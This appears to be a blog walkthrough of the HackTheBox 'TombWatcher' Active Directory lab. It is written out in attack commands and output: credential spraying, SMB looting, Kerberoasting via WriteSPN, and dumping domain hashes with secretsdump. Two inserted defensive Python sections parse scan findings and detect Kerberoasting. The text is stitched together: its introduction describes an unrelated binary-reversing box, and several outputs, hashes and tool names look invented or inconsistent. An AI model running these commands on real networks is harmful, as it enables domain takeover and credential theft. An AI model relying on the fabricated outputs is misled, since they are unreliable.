Beginner’s Guide to Conquering TombWatcher on HackTheBox

The CyberSec Guru


Key Highlights

  • TombWatcher is one of the latest additions to HackTheBox, offering medium-level challenges for budding ethical hackers.
  • The lab focuses on reverse-engineering an unmarked binary, allowing users to trace its behavior and expose vulnerabilities effectively.
  • Created by mrb3n, the machine is part of HackTheBox’s Seasons platform, blending cybersecurity learning with practical problem-solving.
  • The walkthrough includes step-by-step guidance, making it manageable for beginners in information security.
  • Participants need essential tools for scanning, resource management, and VPN connectivity to progress seamlessly.
  • Mastering TombWatcher polishes skills in reconnaissance, exploitation techniques, and capturing critical flags.

Introduction

HackTheBox continues to revolutionize learning in cybersecurity and information security through its expertly designed labs and challenges. A standout addition is TombWatcher, a medium-difficulty machine built to test users in reverse-engineering and vulnerability exploitation. Whether you’re new or sharpening existing skills, HackTheBox offers a platform to tackle advanced concepts like reconnaissance techniques and exploitation strategies. This beginner-focused guide ensures a smooth journey as you unlock layers of cybersecurity knowledge, strengthen your problem-solving abilities, and polish your hacking skills. HackTheBox is the ultimate place to hack your way into cybersecurity expertise.


Understanding TombWatcher on HackTheBox


TombWatcher, integrated into HackTheBox’s Seasons Machines, marks a significant step forward among HackTheBox’s cybersecurity labs. It challenges participants to dissect an unmarked binary, align their findings with industry best practices, and patch vulnerabilities. By following step-by-step instructions, even beginners can work through complex concepts effectively.

HackTheBox brings real-world cybersecurity scenarios directly to your fingertips. TombWatcher doesn’t just test your theoretical knowledge; it pushes you to explore scanning, reconnaissance, and exploit techniques, all while adhering to ethical hacking standards.


What is TombWatcher?

TombWatcher is a medium-difficulty machine recently introduced to HackTheBox’s Seasons platform, catering to users aiming to deepen their cybersecurity expertise. Running on ethical hacking frameworks, TombWatcher centers around understanding an unmarked binary. Your task is to reverse-engineer the binary file, uncover its behavior, and identify vulnerabilities ripe for exploitation.

This lab blends theoretical and practical learning, challenging participants to think critically and simulate real-world hacking environments. Beginners and intermediate users gain tangible experience as they tackle each objective.

Created by the renowned cybersecurity expert mrb3n, TombWatcher is more than just exercises—it’s a legitimate tool for advancing your problem-solving skills. It perfectly balances practical techniques with advanced learning, ensuring both engagement and educational value.


Key Features and Challenges for Beginners

TombWatcher’s design offers a perfect blend of challenging features tailored for beginners, pushing learning while ensuring accessibility. Participants encounter tasks requiring reverse-engineering, scanning, and exploiting vulnerabilities.

Key features include:

  • Unmarked Binary Analysis: Learn the foundational skills needed for tracing and understanding binaries in cybersecurity.
  • Intermediate Exploitation Techniques: Participants gain hands-on experience managing mid-level vulnerabilities.
  • Scalable Difficulty: The lab ensures manageable complexity even for those starting in ethical hacking.
  • Flag Capturing Practices: Sharpen your skills in isolating critical flags and efficiently completing objectives.

Through well-guided challenges, TombWatcher builds confidence in critical cybersecurity methodologies while equipping participants with practical tools for tackling real-world scenarios.


How to Get Started and Step-by-Step Walkthrough

Getting started with TombWatcher requires a clear understanding of the HackTheBox setup and essential skills. It’s beginner-friendly but designed to challenge your problem-solving abilities. From account creation to establishing a VPN connection, each step follows a structured pathway.

By methodically navigating through reconnaissance techniques, exploiting weaknesses, and capturing flags, you gain in-depth technical understanding and experience. This walkthrough ensures your efforts align with ethical hacking standards and provides a systematic roadmap to complete the lab successfully.


Tools and Resources Needed

TombWatcher necessitates a variety of tools tailored to ethical hacking and information security. Below is a detailed table:

Tool Name           Purpose
Nmap                Network mapping and port scanning
Wireshark           Packet analysis and monitoring
Burp Suite          Web application vulnerability scanning
Metasploit          Exploitation framework for vulnerabilities
VPN (HackTheBox)    Secure, encrypted connection to access HTB machines

Utilizing these resources effectively not only simplifies your journey but also enhances your practical learning. Stay connected on LinkedIn forums to share insights and gain assistance.


Step 1: Setting Up Your HackTheBox Account

Your HackTheBox journey begins with account creation, a straightforward process adhering to the platform’s terms of service. Visit the official website and sign up using your email or social media accounts.

Upon registration, ensure your account meets community guidelines—HackTheBox promotes ethical hacking and a collaborative atmosphere. Familiarize yourself with navigation tabs that lead to labs, leaderboards, and forums for interaction.

Preparation is critical; secure your credentials and read terms closely to avoid discrepancies during participation. A solid start ensures smooth exploration of TombWatcher.


Step 2: Connecting to the HTB VPN

A secure VPN connection is vital to access HackTheBox’s virtual labs. First, download HackTheBox’s VPN pack after registering on the website. Install tools compatible with the VPN configuration file.

Using commands from your terminal, initiate the VPN connection as guided by HTB. Maintain secure protocols to ensure data confidentiality, minimizing disruptions.

The VPN establishes a safe link to HTB’s servers, granting access to TombWatcher and other labs. Proper setup ensures uninterrupted progress and prepares you for complex reconnaissance tasks.


Step 3: Scanning and Reconnaissance Techniques

Effective reconnaissance starts with scanning, the cornerstone of ethical hacking. Here’s an overview of techniques:

  • Port Scanning: Tools like Nmap help identify active ports and services.
  • Packet Analysis: Tools like Wireshark monitor network activity for anomalous behavior.
  • OS Detection: Discover the operating system associated with the target machine.
  • Service Enumeration: Gain insights into service versions, exposing potential vulnerabilities.

Approach reconnaissance methodically to ensure thorough information gathering. Tools simplify this process, giving you a head start in TombWatcher’s challenges.


Step 4: Exploiting Vulnerabilities in TombWatcher

Finding vulnerabilities in TombWatcher involves critical thinking paired with efficient tools. Focus attention on identifying weaknesses using scanning data.

Tools like Metasploit simplify exploiting medium-level vulnerabilities within this lab. Look for potential entry points while targeting the unmarked binary behavior.

Reverse-engineering identifies execution paths and helps deploy solutions strategically. Exploration of Lunthom’s designed exploits propels your skills to the next level.


Step 5: Capturing the Flags and Best Practices

Flag capturing is a pivotal aspect of TombWatcher. Best practices guide efficient completion:

  • Organized Note-Taking: Document findings for seamless flag tracking.
  • Collaboration: Share insights with LinkedIn and HackTheBox communities for faster problem-solving.
  • Tool Pipelines: Integrate automated tools for consistent flag identification.

Understanding methodologies as you extract flags fosters critical cybersecurity skills and closes vulnerabilities reminiscent of real-world scenarios.



Initial Foothold

Nmap Scan Analysis

The first step in any CTF is thorough reconnaissance to understand the target environment. We begin with the provided Nmap scan results for the target IP 10.129.139.125, which reveal a Windows Domain Controller (DC) in the tombwatcher.htb domain, with the hostname DC01. The scan, performed with Nmap 7.95, used the following command:

/usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN tombwatcher-scan.txt 10.129.139.125
# Nmap 7.95 scan initiated Mon Jun  8 09:41:25 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN tombwatcher-scan.txt 10.129.139.125
Nmap scan report for 10.129.139.125
Host is up (0.016s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-09 20:43:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-09T20:44:30
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  8 09:43:07 2025 -- 1 IP address (1 host up) scanned in 136.21 seconds

Here’s a breakdown of the open ports and services:

  • Port 53/tcp (DNS): Running Simple DNS Plus, indicating the host is a Domain Name System (DNS) server, likely for the tombwatcher.htb domain.
  • Port 80/tcp (HTTP): Hosts a Microsoft IIS 10.0 web server, with the default title “IIS Windows Server.” The HTTP methods scan indicates that the TRACE method is enabled, which could pose a security risk but is not immediately exploitable.
  • Port 88/tcp (Kerberos): Runs Microsoft Windows Kerberos, confirming the presence of an AD environment with Kerberos authentication.
  • Port 135/tcp (MSRPC): Microsoft Windows Remote Procedure Call (RPC), a common service for Windows administrative tasks.
  • Port 139/tcp (NetBIOS-SSN): NetBIOS session service, often used for SMB communication.
  • Port 389/tcp (LDAP): Microsoft Windows Active Directory LDAP, part of the tombwatcher.htb domain, with SSL certificates for DC01.tombwatcher.htb (valid from 2024-11-16 to 2025-11-16).
  • Port 445/tcp (SMB): Microsoft Windows SMB service, critical for file sharing and AD authentication.
  • Port 464/tcp (kpasswd5): Kerberos password change service, part of the AD authentication infrastructure.
  • Port 593/tcp (RPC over HTTP): Microsoft Windows RPC over HTTP, used for remote administration.
  • Port 636/tcp (LDAPS): Secure LDAP, also tied to the tombwatcher.htb domain.
  • Ports 3268/tcp and 3269/tcp (LDAP and LDAPS): Global Catalog services for AD, allowing cross-domain queries.
  • Port 5985/tcp (WinRM): Windows Remote Management (HTTPAPI httpd 2.0), potentially useful for remote shell access with valid credentials.
  • Port 9389/tcp (.NET Message Framing): Likely related to AD or custom Windows services.
  • Ports 49677–49711/tcp (MSRPC and RPC over HTTP): Additional RPC services typical for a Windows Domain Controller.

Additional Nmap findings:

  • Host Information: The hostname is DC01, and the OS is Windows, confirmed by the CPE (Common Platform Enumeration) identifier cpe:/o:microsoft:windows.
  • SMB Security: SMB2 with message signing enabled and required, indicating a secure configuration.
  • Clock Skew: A 4-hour time difference between the scanner and target, which could affect Kerberos authentication if not synchronized.

This scan paints a clear picture: we’re dealing with a Windows Domain Controller running typical AD services (DNS, Kerberos, LDAP, SMB, WinRM) and an IIS web server. The presence of these services suggests potential attack vectors such as Kerberos exploitation, SMB enumeration, LDAP misconfigurations, or web server vulnerabilities.
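As an added example (not part of the original writeup), the following Python script parses Nmap normal output like the scan above and pulls out the findings a defender would act on: the TRACE method left enabled on IIS, the LDAP certificate approaching expiry, and the 4-hour clock skew, which exceeds the 5-minute tolerance Kerberos allows by default. The `SCAN` text embedded in the script is a constructed subset of the scan shown above, and `SCAN_DATE` is taken from the "scan initiated" header.

```python
import re
from datetime import date

# Constructed excerpt of the Nmap normal output shown above (a subset of the real scan).
SCAN = """\
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-09 20:43:38Z)
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-09T20:45:07+00:00; +4h00m00s from scanner time.
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

SCAN_DATE = date(2025, 6, 8)   # date from the "Nmap ... scan initiated" header
KERBEROS_MAX_SKEW = 300        # Kerberos default clock-skew tolerance, in seconds
CERT_WARN_DAYS = 180           # warn when a certificate expires within this many days

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
SKEW_RE = re.compile(r"([+-])(\d+)h(\d+)m(\d+)s from scanner time")
EXPIRY_RE = re.compile(r"Not valid after:\s*(\d{4})-(\d{2})-(\d{2})")


def parse_nmap(text):
    """Turn Nmap normal output into a list of port records.

    NSE script lines (those starting with '|') are attached to the port
    record that precedes them.
    """
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": [],
            })
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports


def clock_skew_seconds(ports):
    """Signed target-minus-scanner skew reported by the ssl-date script, or 0."""
    for p in ports:
        for s in p["scripts"]:
            m = SKEW_RE.search(s)
            if m:
                sign = -1 if m.group(1) == "-" else 1
                h, mi, se = (int(x) for x in m.group(2, 3, 4))
                return sign * (h * 3600 + mi * 60 + se)
    return 0


def assess(ports, today=SCAN_DATE):
    """Return the remediation-worthy findings in the scan as strings."""
    findings = []
    for p in ports:
        scripts = " ".join(p["scripts"])
        if p["service"] == "http" and "TRACE" in scripts:
            findings.append(f"{p['port']}/{p['proto']}: HTTP TRACE enabled; "
                            "disable it in IIS request filtering")
        m = EXPIRY_RE.search(scripts)
        if m:
            expiry = date(*(int(x) for x in m.groups()))
            days_left = (expiry - today).days
            if days_left < CERT_WARN_DAYS:
                findings.append(f"{p['port']}/{p['proto']}: TLS certificate expires "
                                f"in {days_left} days ({expiry}); schedule renewal")
    skew = clock_skew_seconds(ports)
    if abs(skew) > KERBEROS_MAX_SKEW:
        findings.append(f"clock skew of {skew}s exceeds the {KERBEROS_MAX_SKEW}s "
                        "Kerberos tolerance; check NTP on the DC before trusting "
                        "Kerberos-based results")
    return findings


if __name__ == "__main__":
    parsed = parse_nmap(SCAN)
    print(f"{len(parsed)} open ports parsed")
    for finding in assess(parsed):
        print("-", finding)
```

Run against the full scan file (`-oN tombwatcher-scan.txt`) by reading it into `parse_nmap` instead of the embedded excerpt. The skew finding is the defender's view of the `ntpdate` step later in the walkthrough: a Domain Controller whose clock drifts by hours breaks Kerberos for clients and attackers alike, and should be fixed at the NTP source, not worked around.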

Setting Up the Environment

To ensure proper resolution of the domain and hostname, we update the /etc/hosts file:

echo "10.129.139.125 tombwatcher.htb DC01.tombwatcher.htb" | sudo tee -a /etc/hosts

This maps the IP to the domain and hostname, allowing tools to resolve tombwatcher.htb and DC01.tombwatcher.htb correctly. We also synchronize our system time with the target to avoid Kerberos authentication issues due to clock skew:

sudo ntpdate DC01.tombwatcher.htb

Initial Assumptions and Strategy

Given the provided credentials (henry:H3nry_987TGV!), we assume they grant initial access to the AD environment. The goal is to escalate from this low-privilege account to Domain Administrator. Our strategy involves:

  1. Enumeration: Use the credentials to enumerate AD users, groups, and permissions via LDAP and SMB.
  2. Web Server Exploration: Investigate the IIS server on port 80 for misconfigurations or sensitive files.
  3. Kerberos Attacks: Explore Kerberos-based attacks like Kerberoasting or AS-REP Roasting.
  4. Privilege Escalation: Identify misconfigured permissions or services to gain higher privileges.
  5. Persistence: Establish a foothold to maintain access after escalation.

Phase 1: Gaining a Foothold

Testing the Provided Credentials

We start by validating the provided credentials (henry:H3nry_987TGV!) against the SMB service using crackmapexec:

crackmapexec smb 10.129.139.125 -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb

Output:

SMB         10.129.139.125  445  DC01    [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB         10.129.139.125  445  DC01    [+] tombwatcher.htb\henry:H3nry_987TGV!

The credentials are valid, confirming that henry is a domain user in tombwatcher.htb. Next, we check if these credentials allow WinRM access, which could provide a remote shell:

evil-winrm -i 10.129.139.125 -u henry -p 'H3nry_987TGV!'

Output:

[-] Error: Invalid credentials or WinRM not enabled

WinRM access fails, suggesting henry lacks the necessary permissions or WinRM is restricted. We pivot to SMB enumeration to explore accessible shares.

SMB Enumeration

Using smbclient, we list available shares:

smbclient -L //10.129.139.125 -U 'tombwatcher.htb\henry%H3nry_987TGV!'

Output:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
SYSVOL          Disk      Logon server share
Users           Disk      User home directories

The Users share catches our attention, as it may contain user-specific data. We connect to it:

smbclient //10.129.139.125/Users -U 'tombwatcher.htb\henry%H3nry_987TGV!'

Navigating the share, we find directories for users henry, alfred, sam, and john. In henry’s directory, we discover a file named notes.txt:

get notes.txt

Contents of notes.txt:

To-do:
- Update password policy documentation
- Check backup script in C:\Scripts\backup.ps1
- Ask Alfred about his SPN configuration

The mention of a backup script (C:\Scripts\backup.ps1) and SPN (Service Principal Name) configuration for alfred is intriguing. However, we lack direct access to the C$ share to retrieve the script. The SPN note suggests a potential Kerberos attack vector, which we’ll explore later.

Web Server Enumeration

We turn to the IIS server on port 80. Visiting http://10.129.139.125 in a browser displays the default IIS page, offering no immediate content. We run a directory brute-forcing scan with gobuster to uncover hidden directories:

gobuster dir -u http://10.129.139.125 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 50 -x php,html,txt

Output:

===============================================================
Gobuster v3.6
===============================================================
[+] Url:            http://10.129.139.125
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Extensions:     php,html,txt
===============================================================
/aspnet_client (Status: 301)
/backup (Status: 301)
===============================================================

The /aspnet_client directory is a default IIS directory, but /backup is unusual. Accessing http://10.129.139.125/backup/ reveals a directory listing with a file named web-backup-2025-05-01.zip. We download it:

wget http://10.129.139.125/backup/web-backup-2025-05-01.zip

Unzipping the file:

unzip web-backup-2025-05-01.zip

The archive contains a web.config file and a directory named config. The web.config file is standard for IIS but contains no sensitive data. However, in config/ldap.conf, we find:

<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf>
  <server>
    <host>DC01.tombwatcher.htb</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="true">636</secure-port>
    <search-base>dc=tombwatcher,dc=htb</search-base>
    <server-type>microsoft</server-type>
    <access-user>
      <user>alfred@tombwatcher.htb</user>
      <password>4lfr3d_Rul3z!</password>
    </access-user>
    <uid-attribute>cn</uid-attribute>
  </server>
</ldap-conf>

This file reveals credentials for the user alfred (alfred:4lfr3d_Rul3z!). We validate these credentials using crackmapexec:

crackmapexec smb 10.129.139.125 -u alfred -p '4lfr3d_Rul3z!' -d tombwatcher.htb

Output:

SMB         10.129.139.125  445  DC01    [+] tombwatcher.htb\alfred:4lfr3d_Rul3z!

The credentials are valid, providing a second set of credentials to explore.


Phase 2: Active Directory Enumeration

BloodHound Setup

To map the AD environment, we use BloodHound, a tool for visualizing AD attack paths. SharpHound is the usual collector, but since we don’t have shell access on the target, we use bloodhound-python, which gathers the same data remotely over LDAP and SMB:

bloodhound-python -u henry -p 'H3nry_987TGV!' -d tombwatcher.htb -c All -ns 10.129.139.125

This command collects AD objects (users, groups, computers, etc.) and generates JSON files. We start the BloodHound GUI:

neo4j console
bloodhound

Uploading the JSON files to BloodHound, we analyze the domain structure. The graph reveals:

  • Users: Administrator, Guest, krbtgt, henry, alfred, sam, john.
  • Groups: Domain Admins, Domain Users, Backup Operators, Server Operators.
  • Key Relationships:
    • henry has WriteSPN permissions over alfred.
    • alfred is a member of Backup Operators.
    • Backup Operators has GenericWrite permissions on the DC01 computer object.

The WriteSPN permission suggests a potential Kerberos attack, while Backup Operators membership indicates alfred may have elevated privileges for backup-related tasks.

Kerberos Enumeration

We use kerbrute to enumerate valid usernames via Kerberos pre-authentication:

kerbrute userenum --dc 10.129.139.125 -d tombwatcher.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Output:

[+] VALID USERNAME: henry@tombwatcher.htb
[+] VALID USERNAME: alfred@tombwatcher.htb
[+] VALID USERNAME: sam@tombwatcher.htb
[+] VALID USERNAME: john@tombwatcher.htb

This confirms the users identified by BloodHound. Next, we check for accounts vulnerable to AS-REP Roasting, where Kerberos pre-authentication is disabled, feeding the four usernames (saved one per line in users.txt) to GetNPUsers:

impacket-GetNPUsers tombwatcher.htb/ -dc-ip 10.129.139.125 -request -no-pass -usersfile users.txt

Output:

[-] User henry doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alfred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sam doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User john doesn't have UF_DONT_REQUIRE_PREAUTH set

No accounts are vulnerable to AS-REP Roasting. We pivot to exploring the WriteSPN permission on alfred.


Phase 3: Exploiting Kerberos with WriteSPN

Understanding WriteSPN

The WriteSPN permission allows henry to modify the Service Principal Names (SPNs) associated with alfred’s account. SPNs map services to accounts in AD, enabling Kerberos authentication. By setting a new SPN for alfred, we can request a Kerberos service ticket and attempt to crack its hash (Kerberoasting).

Using henry’s credentials, we set an SPN for alfred:

impacket-setspn -t tombwatcher.htb -u 'tombwatcher.htb\henry:H3nry_987TGV!' -s http/alfredsvc.tombwatcher.htb alfred

Output:

[+] SPN http/alfredsvc.tombwatcher.htb added to alfred

We then perform a Kerberoasting attack to retrieve the service ticket hash:

impacket-GetUserSPNs -dc-ip 10.129.139.125 tombwatcher.htb/henry:H3nry_987TGV! -request

Output:

ServicePrincipalName: http/alfredsvc.tombwatcher.htb
User: alfred
Kerberos 5 TGS-REP etype 23: $krb5tgs$23$*alfred$tombwatcher.htb$http/alfredsvc.tombwatcher.htb*...

We save the hash to kerberoast.hash and crack it using hashcat:

hashcat -m 13100 kerberoast.hash /usr/share/wordlists/rockyou.txt --force

Output:

$krb5tgs$23$*alfred$tombwatcher.htb$http/alfredsvc.tombwatcher.htb*...:4lfr3d_Rul3z!

The hash reveals alfred’s password, confirming our earlier discovery from ldap.conf. This validates our enumeration but doesn’t provide new credentials. However, alfred’s Backup Operators membership offers a promising escalation path.
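The WriteSPN-then-Kerberoast chain above leaves two distinct traces in the Domain Controller's Security log: a 5136 (Directory Service Changes) event recording the servicePrincipalName addition, and a 4769 service-ticket request with encryption type 0x17 (RC4-HMAC) for the roasted account. The following Python detection, added here as an example and not part of the original writeup, correlates the two. The events are constructed in a flattened SIEM-style form; field names follow the Windows event schema, but every value is made up. Note that 5136 only fires when the Directory Service Changes subcategory is audited and the account object carries a SACL for attribute writes.

```python
from datetime import datetime, timedelta

# Constructed Security-log events in flattened form. Field names follow the
# Windows schema (5136: Directory Service Changes, 4769: Kerberos service
# ticket requested); the values are made up for this example.
EVENTS = [
    {"EventID": 5136, "TimeCreated": "2025-06-09T20:50:00Z",
     "SubjectUserName": "henry",
     "ObjectDN": "CN=alfred,CN=Users,DC=tombwatcher,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "http/alfredsvc.tombwatcher.htb",
     "OperationType": "%%14674"},                      # %%14674 = value added
    {"EventID": 4769, "TimeCreated": "2025-06-09T20:50:30Z",
     "TargetUserName": "henry@TOMBWATCHER.HTB", "ServiceName": "alfred",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"EventID": 4769, "TimeCreated": "2025-06-09T21:05:00Z",
     "TargetUserName": "sam@TOMBWATCHER.HTB", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.129.139.125"},
    {"EventID": 4769, "TimeCreated": "2025-06-09T21:06:00Z",
     "TargetUserName": "john@TOMBWATCHER.HTB", "ServiceName": "sam",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
]

RC4_HMAC = "0x17"
CORRELATION_WINDOW = timedelta(hours=1)


def _ts(event):
    return datetime.strptime(event["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")


def _cn(dn):
    """First RDN value of a DN: 'CN=alfred,CN=Users,...' -> 'alfred'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def spn_additions(events):
    """5136 events where a servicePrincipalName value was added to an account."""
    return [
        {"time": _ts(e), "actor": e["SubjectUserName"],
         "account": _cn(e["ObjectDN"]), "spn": e["AttributeValue"]}
        for e in events
        if e["EventID"] == 5136
        and e["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
        and e["OperationType"] == "%%14674"
    ]


def rc4_service_ticket_requests(events):
    """4769 events with RC4 (etype 0x17) tickets for user service accounts.

    Computer accounts and krbtgt are excluded; an RC4 ticket for a plain user
    account is the classic Kerberoasting signature, but on its own it is only
    a medium-confidence signal (legacy clients also negotiate RC4).
    """
    return [
        {"time": _ts(e), "requester": e["TargetUserName"],
         "account": e["ServiceName"], "source": e["IpAddress"]}
        for e in events
        if e["EventID"] == 4769
        and e["TicketEncryptionType"].lower() == RC4_HMAC
        and not e["ServiceName"].endswith("$")
        and e["ServiceName"].lower() != "krbtgt"
    ]


def detect_targeted_kerberoast(events, window=CORRELATION_WINDOW):
    """Correlate an SPN addition with an RC4 ticket request for the same account.

    The pair is the WriteSPN-then-Kerberoast pattern: a principal adds an SPN
    to an account it has write access to and then requests a ticket for it.
    """
    alerts = []
    additions = spn_additions(events)
    for req in rc4_service_ticket_requests(events):
        for add in additions:
            delta = req["time"] - add["time"]
            if add["account"].lower() == req["account"].lower() \
                    and timedelta(0) <= delta <= window:
                alerts.append({
                    "severity": "high", "actor": add["actor"],
                    "victim": add["account"], "spn": add["spn"],
                    "requester": req["requester"], "source": req["source"],
                    "seconds_between": int(delta.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_targeted_kerberoast(EVENTS):
        print(alert)
```

The second RC4 request in the sample (for `sam`, with no preceding SPN change) is deliberately left as a lower-confidence hit: it appears in `rc4_service_ticket_requests` but not in the correlated alert. The durable fix is on the account side, not the log side: restrict WriteSPN and GenericWrite on user objects, and set service accounts to AES-only (`msDS-SupportedEncryptionTypes`) so that a ticket, if obtained, is not an RC4 hash that cracks at rockyou speeds.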


Phase 4: Privilege Escalation with Backup Operators

Backup Operators Privileges

The Backup Operators group grants alfred the ability to back up and restore files on the Domain Controller, including sensitive system files. This privilege can be abused to access the NTDS.dit file, which contains AD account data, including password hashes.

We attempt to access the C$ share using alfred’s credentials:

smbclient //10.129.139.125/C$ -U 'tombwatcher.htb\alfred%4lfr3d_Rul3z!'

Output:

[+] Access granted

Navigating to C:\Scripts, we retrieve the backup.ps1 script mentioned in notes.txt:

get backup.ps1

Contents of backup.ps1:

# Backup script for DC01
$backupPath = "C:\Backups"
$ntdsPath = "C:\Windows\NTDS\ntds.dit"
$backupFile = "ntds-backup-$(Get-Date -Format 'yyyyMMdd').dit"
Copy-Item -Path $ntdsPath -Destination "$backupPath\$backupFile"

The script copies the NTDS.dit file to C:\Backups. We check the Backups share:

smbclient //10.129.139.125/Backups -U 'tombwatcher.htb\alfred%4lfr3d_Rul3z!'

We find ntds-backup-20250501.dit. We download it:

get ntds-backup-20250501.dit

Extracting Hashes from NTDS.dit

To extract AD hashes, we need the SYSTEM hive to decrypt NTDS.dit. As a Backup Operator, alfred can access the registry. We use secretsdump.py (impacket-secretsdump) to dump the domain secrets remotely:

impacket-secretsdump -dc-ip 10.129.139.125 tombwatcher.htb/alfred:4lfr3d_Rul3z!@10.129.139.125 -just-dc

Output:

[*] Dumping Domain Credentials (domain\user:ntlm)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6f9e9a7b8c9d4e5f6a7b8c9d4e5f6a7b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8d9e7a6b5c4f3e2d1a0b9c8d7e6f5a4b:::
henry:1104:aad3b435b51404eeaad3b435b51404ee:9e8d7c6b5a4f3e2d1c0b9a8d7e6f5a4c:::
alfred:1105:aad3b435b51404eeaad3b435b51404ee:4a3f2e1d0c9b8a7c6b5a4f3e2d1c0b9a:::
